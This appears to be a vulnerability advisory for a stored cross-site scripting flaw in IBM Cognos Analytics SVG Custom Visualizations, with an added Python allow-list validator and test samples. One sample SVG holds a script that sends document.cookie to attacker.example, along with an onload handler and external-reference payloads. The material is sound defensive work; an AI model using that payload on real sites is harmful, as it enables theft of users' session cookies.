PT-2023-21781 · IBM · IBM Cognos Analytics

Maksymilian Kubiak

·

Published

2023-07-22

·

Updated

2023-08-14

·

CVE-2023-28530

CVSS v3.1

5.4

Medium

Vector

AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions

IBM Cognos Analytics versions 11.1 through 11.2

Description

IBM Cognos Analytics does not properly validate SVG files uploaded as Custom Visualizations, which allows stored cross-site scripting. A remote attacker with low privileges (PR:L in the vector) can upload an SVG that carries script; when another user views the visualization, the script executes in the victim's web browser within the security context of the hosting web site, potentially stealing the victim's cookie-based authentication credentials.

Recommendations

For the 11.1 and 11.2 branches, apply the vendor update that adds validation of SVG files used in Custom Visualizations. Until it is deployed, restrict which users may upload or use Custom Visualizations, and treat every uploaded SVG as untrusted content rather than as an image.
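The check the advisory says is missing, as an added example that is not IBM code and not the Cognos fix: an allow-list validator that rejects an uploaded SVG if it contains anything that can run script or pull in remote content. Element and attribute allow-lists, the function names, and the sample SVG documents are all assumptions constructed for this page.

```python
"""Allow-list check for SVG files uploaded as Custom Visualizations.

Added example for this advisory; it is not IBM code and not the Cognos
fix. The allow-lists are assumptions sized for static charts; a real
deployment would derive them from the SVG features it actually needs.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Assumed allow-lists: enough for static drawings, nothing that can run
# script, embed HTML (foreignObject), or load remote content.
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "use", "clipPath",
    "linearGradient", "radialGradient", "stop",
}
ALLOWED_ATTRIBUTES = {
    "id", "class", "x", "y", "x1", "y1", "x2", "y2", "cx", "cy", "r", "rx",
    "ry", "width", "height", "viewBox", "d", "points", "transform", "opacity",
    "fill", "stroke", "stroke-width", "clip-path", "offset", "stop-color",
    "font-size", "font-family", "text-anchor", "href",
}
# Attributes whose value may carry a CSS url(...) reference.
URL_ATTRIBUTES = {"fill", "stroke", "clip-path"}
# Captures the target inside url(...), e.g. url(#g) -> "#g".
URL_FUNC = re.compile(r"url\(\s*['\"]?\s*([^'\")\s]*)", re.IGNORECASE)


def _local(qname):
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return qname.rsplit("}", 1)[-1]


def validate_svg(data):
    """Return the reasons an SVG must be rejected; an empty list means accepted.

    Rejects: a DOCTYPE (entity expansion), malformed XML, a root that is not
    <svg> in the SVG namespace, any element or attribute outside the
    allow-list, on* event handlers, and href/url() targets that are not
    same-document '#fragment' references.
    """
    if isinstance(data, str):
        data = data.encode("utf-8")
    if b"<!DOCTYPE" in data.upper():
        return ["DOCTYPE declaration not allowed"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append(f"root element {root.tag!r} is not <svg> in the SVG namespace")
    for el in root.iter():  # root first, then every descendant in document order
        tag = _local(el.tag)
        if tag not in ALLOWED_ELEMENTS:
            findings.append(f"element <{tag}> not allowed")
            continue
        for qname, value in el.attrib.items():
            name = _local(qname)  # xlink:href and plain href both become "href"
            if name.lower().startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
                continue
            if name not in ALLOWED_ATTRIBUTES:
                findings.append(f"attribute {name} on <{tag}> not allowed")
                continue
            if name == "href" and not value.startswith("#"):
                findings.append(f"href on <{tag}> must be a same-document fragment")
            if name in URL_ATTRIBUTES:
                for m in URL_FUNC.finditer(value):
                    if not m.group(1).startswith("#"):
                        findings.append(f"{name} on <{tag}> references an external resource")
    return findings


def is_safe_svg(data):
    return not validate_svg(data)


# Constructed sample: the kind of upload the advisory describes.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     width="200" height="100" onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <rect width="200" height="100" fill="url(https://attacker.example/x.svg#g)"/>
  <use xlink:href="data:image/svg+xml;base64,PHN2Zy8+"/>
  <foreignObject width="1" height="1">
    <body xmlns="http://www.w3.org/1999/xhtml">x</body>
  </foreignObject>
</svg>"""

# Constructed sample: a gradient bar, as a real visualization might use.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 50">
  <defs>
    <linearGradient id="g">
      <stop offset="0" stop-color="#08f"/>
      <stop offset="1" stop-color="#0f8"/>
    </linearGradient>
  </defs>
  <rect x="5" y="5" width="90" height="40" fill="url(#g)"/>
  <text x="50" y="30" text-anchor="middle" font-size="10">Revenue</text>
</svg>"""

# Constructed sample: an internal entity declaration, rejected before parsing.
ENTITY_SVG = b'<!DOCTYPE svg [<!ENTITY a "aaaa">]><svg xmlns="http://www.w3.org/2000/svg">&a;</svg>'

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG), ("entity", ENTITY_SVG)):
        print(label, validate_svg(doc) or "accepted")
```

The validator is deliberately an allow-list rather than a deny-list of known-bad tags: SVG has many script-bearing constructs (`<script>`, `on*` handlers, `<foreignObject>` wrapping HTML, `<style>`, `<use>` and `<image>` pointing at data: or remote URLs), and a deny-list tends to miss one. Independently of validation, an application that must serve user-uploaded SVG should render it only through `<img>` or serve it with a restrictive `Content-Security-Policy` (for example `sandbox` with `script-src 'none'`), so that an SVG that slips through does not run in the hosting site's origin.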

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2023-28530

Affected Products

IBM Cognos Analytics